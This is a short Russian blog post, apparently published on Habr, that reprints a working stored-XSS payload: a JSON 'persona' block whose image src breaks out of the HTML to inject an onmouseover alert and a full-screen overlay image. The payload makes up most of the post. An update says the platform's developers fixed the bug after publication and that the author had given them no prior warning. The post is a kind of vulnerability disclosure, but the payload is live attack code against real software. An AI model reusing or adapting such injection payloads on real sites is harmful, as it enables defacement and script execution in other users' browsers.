Чем хороший программист отличается от плохого, или почему нужно выходить за рамки

Это будет моя самая короткая статья.

о которых писал ранее.

Пейлоад тот же, что и в прошлой статье:

{ "type": "persona", "attrs": { "inserted": false }, "content": [ { "type": "persona_image", "attrs": { "src": "javascript:\"></a>                 <div/onmouseover=alert('xss')>                     <div/style=\"position:fixed;bottom:0;width:100%;height:100vh;background-image:url('https://c.tenor.com/GjsMO1r7HGMAAAAC/hyenas-lion-king.gif');background-position:center;background-repeat:no-repeat;background-size:cover;\">                          &nbsp;                     </div>                 </div>                 <!--<a", "class": "image image-persona" } }, { "type": "persona_heading", "content": [ { "type": "text", "text": "<-- Нажимайте сюда" } ] }, { "type": "paragraph", "attrs": { "align": null, "simple": false, "persona": false } } ] }

UPD. Разрабы Хабра после выхода статьи быстро пофиксили баг. По их словам, вопрос с валидацией в работе. Я не предупреждал о статье, но меня не забанили и отнеслись ко всему позитивно — за это респект.

Заходите в мою телегу: Блог погромиста. Это просто ссылка, не XSS 🙂